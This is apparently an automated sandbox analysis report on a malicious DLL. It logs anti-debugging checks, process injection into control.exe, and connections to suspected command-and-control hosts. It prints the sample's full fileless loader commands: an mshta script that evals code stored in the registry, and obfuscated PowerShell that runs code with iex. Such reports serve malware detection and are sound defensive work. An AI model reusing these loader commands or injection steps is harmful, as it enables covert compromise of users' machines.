          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013A0CA5 mov eax, dword ptr fs:[00000030h]0_2_013A0CA5
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013A0CE8 mov eax, dword ptr fs:[00000030h]0_2_013A0CE8
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013A0B14 mov eax, dword ptr fs:[00000030h]0_2_013A0B14
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013A0BFC mov eax, dword ptr fs:[00000030h]0_2_013A0BFC
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_030E0B14 mov eax, dword ptr fs:[00000030h]3_2_030E0B14
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_030E0BFC mov eax, dword ptr fs:[00000030h]3_2_030E0BFC
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_030E0C57 mov eax, dword ptr fs:[00000030h]3_2_030E0C57
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_030E0CA5 mov eax, dword ptr fs:[00000030h]3_2_030E0CA5
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_030E0CE8 mov eax, dword ptr fs:[00000030h]3_2_030E0CE8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D0CE8 mov eax, dword ptr fs:[00000030h]4_2_006D0CE8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D0BFC mov eax, dword ptr fs:[00000030h]4_2_006D0BFC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D0C57 mov eax, dword ptr fs:[00000030h]4_2_006D0C57
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D0CA5 mov eax, dword ptr fs:[00000030h]4_2_006D0CA5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D0B14 mov eax, dword ptr fs:[00000030h]4_2_006D0B14
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02BF0CA5 mov eax, dword ptr fs:[00000030h]5_2_02BF0CA5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02BF0CE8 mov eax, dword ptr fs:[00000030h]5_2_02BF0CE8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02BF0C57 mov eax, dword ptr fs:[00000030h]5_2_02BF0C57
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02BF0BFC mov eax, dword ptr fs:[00000030h]5_2_02BF0BFC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02BF0B14 mov eax, dword ptr fs:[00000030h]5_2_02BF0B14
          Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_010392F6 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,0_2_010392F6
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_053D92F6 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,3_2_053D92F6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04AB92F6 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,4_2_04AB92F6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04C392F6 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,5_2_04C392F6

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: berukoneru.website
          Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 3.20.161.64 187Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 79.110.52.144 187Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: windows.update3.com
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 18.219.227.107 187Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 3.12.124.139 187Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Windows\System32\loaddll32.exeSection loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: unknown protection: execute and read and write
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: unknown protection: execute and read and write
          Source: C:\Windows\System32\control.exeSection loaded: unknown target: unknown protection: execute and read and write
          Source: C:\Windows\System32\control.exeSection loaded: unknown target: unknown protection: execute and read and write
          Source: C:\Windows\System32\control.exeSection loaded: unknown target: unknown protection: execute and read and write
          Writes to foreign memory regionsShow sources
          Source: C:\Windows\System32\loaddll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF60C1112E0Jump to behavior
          Source: C:\Windows\System32\loaddll32.exeMemory written: C:\Windows\System32\control.exe base: 8E0000Jump to behavior
          Source: C:\Windows\System32\loaddll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF60C1112E0Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\System32\control.exe base: 7FF60C1112E0Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\System32\control.exe base: EC0000Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\System32\control.exe base: 7FF60C1112E0Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF60C1112E0Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF60C1112E0Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF60C1112E0Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: ED0000Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF60C1112E0Jump to behavior
          Allocates memory in foreign processesShow sources
          Source: C:\Windows\System32\loaddll32.exeMemory allocated: C:\Windows\System32\control.exe base: 8E0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\System32\control.exe base: EC0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\control.exe base: ED0000 protect: page execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Windows\System32\loaddll32.exeThread register set: target process: 5116Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeThread register set: target process: 5952Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 5832Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3440
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3440
          Source: C:\Windows\System32\control.exeThread register set: target process: 6676
          Source: C:\Windows\System32\control.exeThread register set: target process: 4856
          Source: C:\Windows\System32\control.exeThread register set: target process: 4964
          Creates a thread in another existing process (thread injection)Show sources
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: unknown EIP: 88E31580
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: unknown EIP: 88E31580
          Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Gxum='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Gxum).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
          Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Aw2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Aw2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
          Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Acrf='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Acrf).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
          Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Sou4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Sou4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.cmdline
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.cmdline
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.cmdline
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.cmdline
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.cmdline
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES391B.tmp" "c:\Users\user\AppData\Local\Temp\jtmpm3o0\CSCBACB7DE77FE24526BA1047DDC177EBA6.TMP"
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4531.tmp" "c:\Users\user\AppData\Local\Temp\kon0vos3\CSCE7DAF0804EB6B39EE1E6CAB9C626.TMP"
          Source: C:\Windows\System32\control.exeProcess created: unknown unknown
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5221.tmp" "c:\Users\user\AppData\Local\Temp\hupbkl0t\CSC47FEF1B1BE13496F9299275D8347BD99.TMP"
          Source: C:\Windows\System32\control.exeProcess created: unknown unknown
          Source: C:\Windows\System32\control.exeProcess created: unknown unknown
          Source: C:\Windows\System32\control.exeProcess created: unknown unknown
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5A7E.tmp" "c:\Users\user\AppData\Local\Temp\wnczrnms\CSC2E55B817A1C42F79C3F14C28684A599.TMP"
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: unknown unknown
          Source: control.exe, 0000002A.00000000.636220674.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.611936251.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.654227363.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.601923838.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002B.00000000.600743349.000001C8AB5E0000.00000002.00020000.sdmp, control.exe, 0000002B.00000000.635430988.000001C8AB5E0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: control.exe, 0000002A.00000000.636220674.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.611936251.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.654227363.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.601923838.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002B.00000000.600743349.000001C8AB5E0000.00000002.00020000.sdmp, control.exe, 0000002B.00000000.635430988.000001C8AB5E0000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: control.exe, 0000002A.00000000.636220674.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.611936251.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.654227363.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.601923838.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002B.00000000.600743349.000001C8AB5E0000.00000002.00020000.sdmp, control.exe, 0000002B.00000000.635430988.000001C8AB5E0000.00000002.00020000.sdmpBinary or memory string: &Program Manager
          Source: control.exe, 0000002A.00000000.636220674.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.611936251.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.654227363.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.601923838.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002B.00000000.600743349.000001C8AB5E0000.00000002.00020000.sdmp, control.exe, 0000002B.00000000.635430988.000001C8AB5E0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
